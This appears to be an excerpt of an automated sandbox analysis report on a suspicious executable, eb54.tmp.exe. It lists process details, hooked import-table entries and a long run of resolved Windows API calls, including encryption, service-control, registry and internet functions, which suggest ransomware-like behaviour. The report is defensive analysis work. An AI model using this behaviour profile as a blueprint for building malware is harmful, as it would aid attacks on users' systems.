Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:02:56
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x838
Parent PID 0x36c (Unknown)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x834, 0x830, 0x82C, 0x828, 0x824, 0x820, 0x81C
Process #13: eb54.tmp.exe
Information Value
ID #13
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\eb54.tmp.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe" --Task
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:48, Reason: Child Process
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:02:56
OS Process Information
Information Value
PID 0x818
Parent PID 0x838 (c:\windows\system32\taskeng.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x814, 0x8D0, 0x8B8, 0x8B4, 0xB0, 0x900, 0x904
Hook Information
Type Installer Target Size Information Actions
IAT private_0x0000000000580000:+0x5567d 2. entry of eb54.tmp.exe 4 bytes kernel32.dll:LoadLibraryW+0x0 now points to private_0x000000007fff0000:+0x9c22b0c
IAT private_0x0000000000580000:+0x5567d 3. entry of eb54.tmp.exe 4 bytes kernel32.dll:TerminateThread+0x0 now points to private_0x000000007fff0000:+0x433cf85d
IAT private_0x0000000000580000:+0x5567d 4. entry of eb54.tmp.exe 4 bytes kernel32.dll:WritePrivateProfileStructW+0x0 now points to private_0x000000007fff0000:+0x9115d8b
IAT private_0x0000000000580000:+0x5567d 5. entry of eb54.tmp.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x610184d
IAT private_0x0000000000580000:+0x5567d 7. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0xbf97d8b
IAT private_0x0000000000580000:+0x5567d 8. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x79040c45
IAT private_0x0000000000580000:+0x5567d 12. entry of eb54.tmp.exe 4 bytes kernel32.dll:LocalAlloc+0x0 now points to pagefile_0x0000000000680000:+0x21573
IAT private_0x0000000000580000:+0x5567d 13. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetProfileStringA+0x0 now points to private_0x000000007fff0000:+0xbf975ff
IAT private_0x0000000000580000:+0x5567d 18. entry of eb54.tmp.exe 4 bytes kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0xb8074f3
IAT private_0x0000000000580000:+0x5567d 19. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x78841446
IAT private_0x0000000000580000:+0x5567d 20. entry of eb54.tmp.exe 4 bytes kernel32.dll:lstrcpyA+0x0 now points to private_0x000000007fff0000:+0xb087208
IAT private_0x0000000000580000:+0x5567d 25. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x568c02eb
IAT private_0x0000000000580000:+0x5567d 26. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetDriveTypeW+0x0 now points to private_0x000000007fff0000:+0x5fd458b
IAT private_0x0000000000580000:+0x5567d 27. entry of eb54.tmp.exe 4 bytes kernel32.dll:DuplicateHandle+0x0 now points to private_0x000000007fff0000:+0xb2274c0
IAT private_0x0000000000580000:+0x5567d 28. entry of eb54.tmp.exe 4 bytes kernel32.dll:GlobalMemoryStatus+0x0 now points to private_0x000000007fff0000:+0x4004085d
IAT private_0x0000000000580000:+0x5567d 33. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x3a7be850
IAT private_0x0000000000580000:+0x5567d 40. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetConsoleMode+0x0 now points to private_0x000000007fff0000:+0x4e8c02eb
IAT private_0x0000000000580000:+0x5567d 41. entry of eb54.tmp.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to private_0x000000007fff0000:+0x519458b
IAT private_0x0000000000580000:+0x5567d 42. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x69850fc0
IAT private_0x0000000000580000:+0x5567d 47. entry of eb54.tmp.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to private_0x000000007fff0000:+0x7a83e850
IAT private_0x0000000000580000:+0x5567d 48. entry of eb54.tmp.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x44840001
IAT private_0x0000000000580000:+0x5567d 49. entry of eb54.tmp.exe 4 bytes kernel32.dll:TlsGetValue+0x0 now points to pagefile_0x00000000009a0000:+0x134e90c
IAT private_0x0000000000580000:+0x5567d 54. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x000000007fff0000:+0x6b0f8b04
IAT private_0x0000000000580000:+0x5567d 55. entry of eb54.tmp.exe 4 bytes kernel32.dll:InterlockedDecrement+0x0 now points to private_0x000000007fff0000:+0x3cf8b02
IAT private_0x0000000000580000:+0x5567d 64. entry of eb54.tmp.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x6b178b04
IAT private_0x0000000000580000:+0x5567d 65. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetTickCount+0x0 now points to private_0x000000007fff0000:+0x3d78b02
IAT private_0x0000000000580000:+0x5567d 69. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x7c76ff0c
IAT private_0x0000000000580000:+0x5567d 72. entry of eb54.tmp.exe 4 bytes kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x69420c8d
IAT private_0x0000000000580000:+0x5567d 75. entry of eb54.tmp.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x315468b
IAT private_0x0000000000580000:+0x5567d 78. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x7884d68b
IAT private_0x0000000000580000:+0x5567d 79. entry of eb54.tmp.exe 4 bytes kernel32.dll:VirtualAlloc+0x0 now points to private_0x000000007fff0000:+0xb057208
IAT private_0x0000000000580000:+0x5567d 80. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0xb03eb0e
IAT private_0x0000000000580000:+0x5567d 84. entry of eb54.tmp.exe 4 bytes user32.dll:EndPaint+0x0 now points to private_0x000000007fff0000:+0xd20048d
IAT private_0x0000000000580000:+0x5567d 86. entry of eb54.tmp.exe 4 bytes user32.dll:EnumDisplaySettingsA+0x0 now points to private_0x000000007fff0000:+0xc00ff72
IAT private_0x0000000000580000:+0x5567d 87. entry of eb54.tmp.exe 4 bytes user32.dll:DrawTextExW+0x0 now points to private_0x000000007fff0000:+0x44841446
IAT private_0x0000000000580000:+0x5567d 90. entry of eb54.tmp.exe 4 bytes user32.dll:SetPropA+0x0 now points to private_0x000000007fff0000:+0x568c02eb
IAT private_0x0000000000580000:+0x5567d 92. entry of eb54.tmp.exe 4 bytes user32.dll:LoadImageA+0x0 now points to private_0x000000007fff0000:+0xb0f8b0e
IAT private_0x0000000000580000:+0x5567d 93. entry of eb54.tmp.exe 4 bytes user32.dll:DestroyCursor+0x0 now points to private_0x000000007fff0000:+0xd541445
Host Behavior
File (504)
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Open - - False 498
Fn
Module (281)
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load WINMM.dll base_address = 0x74af0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 1
Fn
Load OLEAUT32.dll base_address = 0x75220000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x74b50000 True 1
Fn
Load WS2_32.dll base_address = 0x75bc0000 True 1
Fn
Load DNSAPI.dll base_address = 0x74a80000 True 1
Fn
Load CRYPT32.dll base_address = 0x759b0000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 12
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\eb54.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe, size = 260 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74af26e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEndOfFile, address_out = 0x76c4ce2e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadConsoleW, address_out = 0x76cd739a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x74f57136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
